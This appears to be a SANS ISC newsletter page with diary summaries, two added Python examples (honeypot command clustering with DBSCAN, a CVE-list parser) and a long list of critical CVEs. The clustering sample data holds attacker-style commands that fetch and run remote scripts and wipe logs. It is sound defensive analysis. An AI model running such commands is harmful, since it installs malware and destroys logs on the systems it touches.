ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html
Python Infostealer Patching Windows Exodus App
Published: 2024-09-18.
Last Updated: 2024-09-18 07:43:00 UTC
by Xavier Mertens (Version: 1)
A few months ago, I wrote a diary[1] about a Python script that replaced the Exodus[2] Wallet app with a rogue one on macOS. Infostealers are everywhere these days. They target mainly browsers (cookies, credentials) and classic applications that may handle sensitive information. Cryptocurrency wallets are another category of applications that are juicy for attackers. I again spotted an interesting piece of malware that mimics an Exodus wallet by displaying a small GUI ...
https://isc.sans.edu/diary/Python+Infostealer+Patching+Windows+Exodus+App/31276/
Finding Honeypot Data Clusters Using DBSCAN: Part 2
Published: 2024-09-13.
Last Updated: 2024-09-13 14:45:14 UTC
by Jesse La Grew (Version: 1)
In an earlier diary, I reviewed how using tools like DBSCAN can be useful to group similar data. I used DBSCAN to try to group similar commands submitted to Cowrie and URL paths submitted to the DShield web honeypot. DBSCAN was very helpful to group similar commands, but it was also very useful when trying to determine whether commands from one honeypot were seen in another. How much overlap in attack data is there between honeypots? Is there any targeting based on the hosting location of the honeypot?
Once the data is separated into clusters and the appropriate eps and min_samples values are selected, comparing the data in a table can help highlight differences ...
https://isc.sans.edu/diary/Finding+Honeypot+Data+Clusters+Using+DBSCAN+Part+2/31194/
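The diary above describes clustering honeypot commands with DBSCAN and then checking which clusters show up on which sensor. As an added example that is not part of the diary or of the DShield project, the following Python script implements a minimal DBSCAN over Cowrie-style commands using the Jaccard distance between token sets (standard library only, no scikit-learn), pools the commands of two hypothetical honeypots, and reports which clusters both sensors share. The commands, the honeypot names "A" and "B", and the eps/min_samples choices are constructed for illustration, not taken from real honeypot data.

```python
# Added example, not code from the ISC diary: a minimal DBSCAN over honeypot
# command strings (standard library only), followed by a cross-honeypot check
# of which clusters appear on more than one sensor. The Cowrie-style commands
# below are constructed sample input, not real honeypot data.
import re
from collections import defaultdict

# Constructed sample input: commands captured on two hypothetical honeypots.
HONEYPOT_A = [
    "cd /tmp; wget http://1.2.3.4/bot.sh; chmod +x bot.sh; ./bot.sh",
    "cd /tmp; wget http://5.6.7.8/x86; chmod +x x86; ./x86",
    "cd /tmp; curl -O http://1.2.3.4/bot.sh; chmod +x bot.sh; ./bot.sh",
    "uname -a",
    "cat /proc/cpuinfo | grep name | wc -l",
    "cat /proc/cpuinfo | grep model | wc -l",
    "enable; system; shell; sh",
]
HONEYPOT_B = [
    "cd /tmp; wget http://9.9.9.9/bot.sh; chmod +x bot.sh; ./bot.sh",
    "uname -a",
    "rm -rf /var/log/*",
]


def tokens(command):
    """Token set for a shell command. URLs and digit runs are normalised first
    so that two downloaders that differ only in host or filename cluster together."""
    cmd = re.sub(r"https?://[^\s;|&]+", "URL", command)
    cmd = re.sub(r"\d+", "N", cmd)
    return set(re.findall(r"[A-Za-z_/.+\-]+|[;|&]", cmd))


def jaccard_distance(a, b):
    """One minus the Jaccard similarity: 0.0 for identical sets, 1.0 for disjoint ones."""
    if not a and not b:
        return 0.0
    return 1.0 - len(a & b) / len(a | b)


def dbscan(points, eps, min_samples, distance):
    """Plain DBSCAN: returns one label per point, 0.. for clusters and -1 for
    noise. A point is core if at least min_samples points (itself included, as
    in scikit-learn) lie within distance <= eps of it."""
    n = len(points)
    labels = [None] * n

    def neighbours(i):
        return [j for j in range(n) if distance(points[i], points[j]) <= eps]

    cluster = 0
    for i in range(n):
        if labels[i] is not None:
            continue
        seeds = neighbours(i)
        if len(seeds) < min_samples:
            labels[i] = -1            # provisional noise; may become a border point later
            continue
        labels[i] = cluster
        queue = [j for j in seeds if j != i]
        while queue:
            j = queue.pop()
            if labels[j] == -1:
                labels[j] = cluster   # noise reachable from a core point -> border point
            if labels[j] is not None:
                continue
            labels[j] = cluster
            seeds_j = neighbours(j)
            if len(seeds_j) >= min_samples:
                queue.extend(seeds_j) # j is a core point itself: keep expanding
        cluster += 1
    return labels


def cluster_commands(sources, eps=0.5, min_samples=2):
    """sources: {honeypot_name: [command, ...]}. Pools every command, runs DBSCAN
    on the Jaccard distance between token sets, and returns
    {label: {"commands": [...], "honeypots": {...}}} so the overlap between
    sensors can be read off per cluster."""
    pooled = [(name, cmd) for name, cmds in sources.items() for cmd in cmds]
    labels = dbscan([tokens(c) for _, c in pooled], eps, min_samples, jaccard_distance)
    clusters = defaultdict(lambda: {"commands": [], "honeypots": set()})
    for (name, cmd), label in zip(pooled, labels):
        clusters[label]["commands"].append(cmd)
        clusters[label]["honeypots"].add(name)
    return dict(clusters)


def shared_clusters(clusters):
    """Labels of real clusters (noise excluded) seen on more than one honeypot."""
    return sorted(label for label, c in clusters.items()
                  if label != -1 and len(c["honeypots"]) > 1)


if __name__ == "__main__":
    result = cluster_commands({"A": HONEYPOT_A, "B": HONEYPOT_B})
    for label in sorted(result):
        tag = "noise" if label == -1 else f"cluster {label}"
        print(f"{tag:10} seen on {sorted(result[label]['honeypots'])}")
        for cmd in result[label]["commands"]:
            print("    ", cmd)
    print("clusters shared by both honeypots:", shared_clusters(result))
```

With eps=0.5 the wget/x86 and curl/bot.sh variants are further than eps from each other, but each is within eps of the first wget/bot.sh command, so DBSCAN still chains all four downloaders into one cluster; that density-reachability is what makes it forgiving of small edits in otherwise identical payload-fetch commands. The cpuinfo commands form a cluster seen only on honeypot A, and the one-off commands end up as noise. As the diary notes, eps and min_samples have to be chosen against your own data; the values here only suit the sample.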
Hygiene, Hygiene, Hygiene! [Guest Diary]
Published: 2024-09-11.
Last Updated: 2024-09-12 22:38:15 UTC
by Guy Bruneau (Version: 1)
[This is a Guest Diary by Paul Olson, an ISC intern as part of the SANS.edu BACS program]
Introduction
Starting my internship with SANS Internet Storm Center was daunting from the aspect of being unsure of what to expect. Over the years I’ve completed several SANS courses and have become comfortable with that experience; there is a flow to the courses and the SANS instructors exceed my expectations. In this respect, the ISC Internship is a completely different animal; it presents a more hands-on learning opportunity, requires more self-reliance, and provides a greater element of unpredictability than I have found in SANS course labs. With more of the Internship work behind me than in front of me I can say that I have gotten more out of this internship than I have from other similar experiences.
Some of my concerns were about the ‘unknown unknowns’. Setting up the DShield honeypot [3] was a straightforward exercise; my biggest worry was meeting the objectives of the Internship. Over the years that I have had broadband Internet I have periodically reviewed the logs generated by my home firewall. The firewall logs didn’t provide a wealth of information (event time, source and destination IP, protocol and ports involved, etc.). My concern became “How am I going to produce seven attack observation reports out of this? Who is going to bother with this device connected in a basement to a broadband network in North Dakota, US?”.
As it turns out that wasn’t going to be an issue. This newly-minted honeypot was remotely interacted with over 1,600 times from 169 distinct IP addresses on the first day; the device currently averages 17,000 probes daily. Reviewing the honeypot logs, one of the first lessons I learned from the Internship is that there are vast differences between a single-dimension firewall log and the level of detail in the data the honeypot captures when it is probed.
https://isc.sans.edu/diary/Hygiene+Hygiene+Hygiene+Guest+Diary/31260/
23:59, Time to Exfiltrate! (2024.09.17)
https://isc.sans.edu/diary/2359+Time+to+Exfiltrate/31272/
Managing PE Files With Overlays (2024.09.16)
https://isc.sans.edu/diary/Managing+PE+Files+With+Overlays/31268/
YARA-X's Dump Command (2024.09.15)
https://isc.sans.edu/diary/YARAXs+Dump+Command/31264/
YARA 4.5.2 Release (2024.09.14)
https://isc.sans.edu/diary/YARA+452+Release/31258/
Python Libraries Used for Malicious Purposes (2024.09.11)
https://isc.sans.edu/diary/Python+Libraries+Used+for+Malicious+Purposes/31248/
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.
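To work with a list like the one below rather than read it top to bottom, it helps to parse the entries into records and rank them, with anything on the CISA KEV list first regardless of CVSS. The following Python script is an added example, not the newsletter's own tooling: it parses the Product / CVSS Score / ** KEV since ** / NVD / NVD References layout used on this page, taking a few entries copied from the list as its sample input, and orders them KEV first, then by CVSS. The kev_ids parameter is an assumption for merging in CVE ids from a KEV feed you fetch separately; the page itself only carries the "** KEV since **" tags.

```python
# Added example, not code from the ISC newsletter: a parser for the entry
# format used in this list (Product / CVSS Score / ** KEV since ** / NVD /
# NVD References) and a ranking step that puts KEV-listed items first.
# SAMPLE holds entries copied from this page; kev_ids is an assumed input
# for CVE ids taken from a CISA KEV feed fetched separately.
import re
from dataclasses import dataclass, field
from typing import List, Optional

NVD_URL_RE = re.compile(r"https?://nvd\.nist\.gov/vuln/detail/(CVE-\d{4}-\d{4,})")
URL_RE = re.compile(r"https?://\S+")
# Some entries are preceded by a description line: "CVE-2024-1234 - text"
DESC_RE = re.compile(r"^CVE-\d{4}-\d{4,}(?:\s*&\s*CVE-\d{4}-\d{4,})*\s+-\s+")
# (attribute, pattern, cast) for the single-value fields an entry line may carry
FIELD_PATTERNS = [
    ("cvss", r"CVSS Score:\s*([\d.]+)", float),
    ("at_risk", r"AtRiskScore\s+(\d+)", int),
    ("kev_since", r"KEV since (\d{4}-\d{2}-\d{2})", str),
    ("installs", r"Active Installations:\s*(.+)", str),
]

SAMPLE = """\
Product: Microsoft Windows 10 1507
CVSS Score: 8.8
** KEV since 2024-09-16 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43461
ISC Podcast: https://isc.sans.edu/podcastdetail/9140
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43461
Product: Ivanti Cloud Services Appliance
CVSS Score: 7.2
** KEV since 2024-09-13 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8190
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190
Product: Docker Desktop
CVSS Score: 9.8 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8695
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8696
NVD References: https://docs.docker.com/desktop/release-notes/#4342
CVE-2024-38812 - vCenter Server is vulnerable to a heap-overflow in the DCERPC protocol, allowing remote code execution by a malicious actor via a specially crafted network packet.
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
Product: Loftware Spectrum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-37226
NVD References:
- https://code-white.com/public-vulnerability-list/
- https://docs.loftware.com/spectrum-releasenotes/Content/Hotfix/4.6_HF14.htm
"""


@dataclass
class Entry:
    product: str
    description: Optional[str] = None
    cves: List[str] = field(default_factory=list)
    cvss: Optional[float] = None
    at_risk: Optional[int] = None       # the newsletter's own "AtRiskScore" tag
    kev_since: Optional[str] = None     # ISO date from "** KEV since ... **"
    installs: Optional[str] = None      # "Active Installations:" for WP plugins
    references: List[str] = field(default_factory=list)


def parse_entries(text):
    """Split newsletter text into Entry records. Every line of an entry is
    scanned for whatever fields it carries, so the layout variants on the page
    (several NVD: lines, '- url' reference lists) all parse the same way."""
    entries, current, pending_desc = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if DESC_RE.match(line):
            pending_desc = line          # belongs to the next Product: block
            continue
        if line.startswith("Product:"):
            current = Entry(product=line[len("Product:"):].strip(), description=pending_desc)
            pending_desc = None
            entries.append(current)
            continue
        if current is None:
            continue                     # intro text before the first entry
        for attr, pattern, cast in FIELD_PATTERNS:
            m = re.search(pattern, line)
            if m:
                setattr(current, attr, cast(m.group(1)))
        for url in URL_RE.findall(line):
            nvd = NVD_URL_RE.match(url)
            if nvd is None:
                current.references.append(url)
            elif nvd.group(1) not in current.cves:
                current.cves.append(nvd.group(1))
    return entries


def prioritise(entries, kev_ids=frozenset(), min_cvss=9.0):
    """Keep entries that are KEV-listed (per the page or per kev_ids) or score at
    least min_cvss; order them KEV first, then by CVSS descending, then product."""
    def in_kev(e):
        return e.kev_since is not None or any(c in kev_ids for c in e.cves)
    kept = [e for e in entries if in_kev(e) or (e.cvss or 0.0) >= min_cvss]
    return sorted(kept, key=lambda e: (not in_kev(e), -(e.cvss or 0.0), e.product))


if __name__ == "__main__":
    for e in prioritise(parse_entries(SAMPLE)):
        print(e.cvss, f"KEV {e.kev_since}" if e.kev_since else "-", ", ".join(e.cves), e.product)
```

The ranking deliberately puts a CVSS 7.2 KEV entry (the Ivanti CSA bug) above three 9.8 entries that are not known to be exploited, which is the order a patching queue should follow. Passing a set of CVE ids from your own KEV download in kev_ids promotes entries the page has not tagged yet; raising min_cvss trims the non-KEV tail.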
Product: Microsoft Windows 10 1507
CVSS Score: 8.8
** KEV since 2024-09-16 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43461
ISC Podcast: https://isc.sans.edu/podcastdetail/9140
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43461
Product: Microsoft Windows 10 1507
CVSS Score: 9.8
** KEV since 2024-09-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43491
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43491
Product: Ivanti Cloud Services Appliance
CVSS Score: 7.2
** KEV since 2024-09-13 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8190
ISC Podcast: https://isc.sans.edu/podcastdetail/9138
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190
Product: Ivanti Endpoint Manager
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-29847
ISC Podcast: https://isc.sans.edu/podcastdetail/9138
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022
Product: Ivanti Endpoint Manager
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8191
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022
Product: Microsoft Windows 10 1507
CVSS Score: 7.8
** KEV since 2024-09-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38014
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38014
Product: Microsoft Office
CVSS Score: 7.3
** KEV since 2024-09-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38226
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38226
Product: Microsoft Windows 10 1507
CVSS Score: 5.4
** KEV since 2024-09-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38217
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38217
Product: Microsoft Windows
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-6596
NVD References: https://cert.vde.com/en/advisories/VDE-2024-041
Product: Siemens Totally Integrated Automation Portal (TIA Portal)
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-33698
NVD References: https://cert-portal.siemens.com/productcert/html/ssa-039007.html
Product: Siemens SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 18)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-35783
NVD References: https://cert-portal.siemens.com/productcert/html/ssa-629254.html
Product: Siemens Industrial Edge Management
CVSS Score: 10.0 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45032
NVD References: https://cert-portal.siemens.com/productcert/html/ssa-359713.html
Product: Samsung Escargot
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-40754
NVD References: https://github.com/Samsung/escargot/pull/1369
Product: Loftware Spectrum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-37226
NVD References:
- https://code-white.com/public-vulnerability-list/
- https://docs.loftware.com/spectrum-releasenotes/Content/Hotfix/4.6_HF14.htm
Product: Loftware Spectrum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-37227
NVD References:
- https://code-white.com/public-vulnerability-list/
- https://docs.loftware.com/spectrum-releasenotes/Content/Hotfix/4.6_HF13.htm
Product: Loftware Spectrum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-37231
NVD References:
- https://code-white.com/public-vulnerability-list/
- https://docs.loftware.com/spectrum-releasenotes/Content/Hotfix/4.6_HF14.htm
Product: Aladdin
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44677
NVD References:
- https://github.com/elunez/eladmin
- https://github.com/jcxj/jcxj/blob/master/source/_posts/eladmin-%E5%A4%8D%E7%8E%B0.md
Product: Nix
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45593
NVD References:
- https://github.com/NixOS/nix/commit/eb11c1499876cd4c9c188cbda5b1003b36ce2e59
- https://github.com/NixOS/nix/security/advisories/GHSA-h4vv-h3jq-v493
Product: Microsoft Azure Web Apps
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38194
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38194
Product: Microsoft Azure Stack Hub
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38216
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38220
NVD References:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38216
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38220
Product: Microsoft Dynamics 365 Business Central
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38225
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38225
Product: Microsoft Windows 10 1507
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38240
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38240
Product: Microsoft Windows Server 2008
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43455
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43455
Product: JimuSoftware JimuReport
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44893
NVD References: https://github.com/jeecgboot/JimuReport/issues/2904
Product: Ruby-SAML
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45409
NVD References:
- https://github.com/SAML-Toolkits/ruby-saml/commit/1ec5392bc506fe43a02dbb66b68741051c5ffeae
- https://github.com/SAML-Toolkits/ruby-saml/commit/4865d030cae9705ee5cdb12415c654c634093ae7
- https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
- https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
Product: Renwoxing Enterprise Intelligent Management System
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43040
NVD References: https://gist.github.com/X1lyS/75a8ea48c4997b683e8b41c94e79e5f9
Product: VICIdial
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8503
NVD References:
- https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt
Product: WordPress video carousel slider with lightbox plugin
Active Installations: 1,000+
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2019-25212
NVD References:
- https://wordpress.org/plugins/wp-responsive-video-gallery-with-lightbox
Product: WooCommerce Photo Reviews Premium (plugin)
Active Installations: 20,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8277
NVD References:
- https://codecanyon.net/item/woocommerce-photo-reviews/21245349
Product: SO Planning online planning tool
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-27114
NVD References: https://csirt.divd.nl/CVE-2024-27114
Product: Comfast CF-XR11
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44466
NVD References: https://github.com/CurryRaid/iot_vul/tree/main/comfast
Product: evilnapsis Inventio Lite
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44541
NVD References:
Product: Solarwinds Access Rights Manager
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-28990
NVD References:
- https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-28990
Product: No-IP Dynamic Update Client (DUC)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-40457
NVD References:
- https://www.noip.com/support/knowledgebase/install-linux-3-x-dynamic-update-client-duc
- https://www.noip.com/support/knowledgebase/running-linux-duc-v3-0-startup-2
Product: Nozomi Networks SCADAguardian
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45824
NVD References: https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1696.html
Product: GitLab-EE
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-2743
NVD References:
Product: GitLab CE/EE
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-6678
NVD References:
Product: Docker Desktop
CVSS Score: 9.8 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8695
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8696
NVD References: https://docs.docker.com/desktop/release-notes/#4342
Product: ORDAT FOSS-Online
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-34334
NVD References:
- https://mind-bytes.de/sql-injection-in-foss-online-cve-2024-34334/
Product: Adobe ColdFusion 2021
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-41874
NVD References: https://helpx.adobe.com/security/products/coldfusion/apsb24-71.html
Product: Best Free Law Office Management Software
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44430
NVD References:
- https://blog.csdn.net/samwbs/article/details/140954482
- https://github.com/samwbs/kortexcve/blob/main/xss_register_case/XSS_register_case.md
Product: AFMobi Boomplayer
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8039
NVD References:
Product: The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress
Active Installations: 200,000+
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8669
NVD References:
- https://plugins.trac.wordpress.org/browser/backuply/trunk/functions.php#L1477
Product: Code-Projects Crud Operation System
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8762
NVD References: https://github.com/Kangsiyuan/1/issues/1
CVE-2024-8868 - Code-projects Crud Operation System 1.0 is vulnerable to a critical sql injection issue in the file savedata.php through the argument sname.
Product: Code-Projects Crud Operation System
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8868
NVD References: https://github.com/ppp-src/a/issues/7
CVE-2024-46918 - MISP allows org admins to view sensitive login fields of other org admins in the same org before version 2.4.198.
Product: MISP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46918
NVD References:
- https://github.com/MISP/MISP/commit/3a5227d7b3d4518ac109af61979a00145a0de6fa
- https://github.com/MISP/MISP/compare/v2.4.197...v2.4.198
CVE-2024-46942 - OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) through 13.0.1 allows a controller with a follower role to configure flow entries in a clustering deployment.
Product: OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46942
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/mdsal.html
- https://doi.org/10.48550/arXiv.2408.16940
- https://lf-opendaylight.atlassian.net/browse/MDSAL-869
CVE-2024-46943 - OpenDaylight Authentication, Authorization and Accounting (AAA) through 0.19.3 allows a rogue controller to impersonate an offline peer by joining a cluster without possessing complete configuration information.
Product: OpenDaylight Authentication, Authorization and Accounting (AAA)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46943
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/aaa.html
- https://doi.org/10.48550/arXiv.2408.16940
- https://lf-opendaylight.atlassian.net/browse/AAA-285
CVE-2024-45694 & CVE-2024-45695 - Certain models of D-Link wireless routers are susceptible to Stack-based Buffer Overflow vulnerabilities, enabling unauthenticated remote attackers to execute arbitrary code on the device.
Product: D-Link DIR-X5460 and D-Link DIR-X4860
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45694
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45695
NVD References:
- https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html
- https://www.twcert.org.tw/tw/cp-132-8080-7f494-1.html
- https://www.twcert.org.tw/en/cp-139-8083-a299e-2.html
- https://www.twcert.org.tw/tw/cp-132-8082-f1687-1.html
CVE-2024-45697 - D-Link wireless routers have a hidden telnet service vulnerability that allows unauthorized remote attackers to execute OS commands using hard-coded credentials.
Product: D-Link wireless routers
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45697
NVD References:
- https://www.twcert.org.tw/en/cp-139-8089-32df6-2.html
- https://www.twcert.org.tw/tw/cp-132-8088-590ed-1.html
CVE-2024-22399 - Apache Seata is vulnerable to deserialization of untrusted data when authentication is disabled on the Seata-Server and the Seata client SDK dependencies are not used, allowing for the construction of malicious requests using bytecode based on the Seata private protocol.
Product: Apache Seata
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-22399
NVD References: https://lists.apache.org/thread/91nzzlxyj4nmks85gbzwkkjtbmnmlkc4
CVE-2024-46451 - TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWiFiAclRules function via the desc parameter.
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46451
NVD References: https://github.com/offshore0315/loT-vulnerable/blob/main/TOTOLINK/AC1200%20T8/setWiFiAclRules.md
CVE-2024-46419 - TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWizardCfg function via the ssid5g parameter.
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46419
NVD References: https://github.com/TTTJJJWWW/AHU-IoT-vulnerable/blob/main/TOTOLINK/AC1200T8/setWizardCfg.md
CVE-2024-46937 - MFASOFT Secure Authentication Server (SAS) versions 1.8.x through 1.9.x before 1.9.040924 allows remote attackers to access user tokens without authentication by brute-forcing the serial parameter.
Product: MFASOFT Secure Authentication Server (SAS)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46937
NVD References:
- https://github.com/WI1D-41/IDOR-in-MFASOFT-Secure-Authentication-Server
CVE-2024-45496 - OpenShift is vulnerable to arbitrary command execution due to misuse of elevated privileges in the build process, allowing an attacker to escalate permissions on the worker node.
Product: Red Hat OpenShift
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45496
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-45496
- https://bugzilla.redhat.com/show_bug.cgi?id=2308661
CVE-2024-7387 - Openshift/builder is vulnerable to command injection via path traversal allowing an attacker to execute arbitrary commands on the OpenShift node.
Product: Red Hat Openshift/builder
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-7387
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-7387
- https://bugzilla.redhat.com/show_bug.cgi?id=2302259
CVE-2024-38812 - vCenter Server is vulnerable to a heap-overflow in the DCERPC protocol, allowing remote code execution by a malicious actor via a specially crafted network packet.
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
CVE-2024-45798 - Arduino-esp32 is vulnerable to Poisoned Pipeline Execution (PPE) vulnerabilities affecting the `tests_results.yml` workflow and environment variable injection.
Product: Arduino arduino-esp32
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45798
NVD References:
- https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- https://securitylab.github.com/research/github-actions-untrusted-input
CVE-2024-8956 - The PTZOptics PT30X-SDI/NDI-xx camera before firmware 6.3.40 is vulnerable to an insufficient authentication issue, allowing a remote attacker to leak sensitive data and manipulate configuration settings without proper authentication.
Product: PTZOptics PT30X-SDI/NDI-xx
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8956
NVD References:
- https://ptzoptics.com/firmware-changelog/
- https://vulncheck.com/advisories/ptzoptics-insufficient-auth
CVE-2024-43976 & CVE-2024-43978 - Super Store Finder is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, affecting versions from n/a through 6.9.7.
Product: highwarden Super Store Finder
Active Installations: unknown
CVSS Score: 9.3 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43976
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43978
CVE-2024-44004 - WPTaskForce WPCargo Track & Trace allows SQL Injection through improper neutralization of special elements in SQL commands.
Product: WPTaskForce WPCargo Track & Trace
Active Installations: 10,000+
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44004
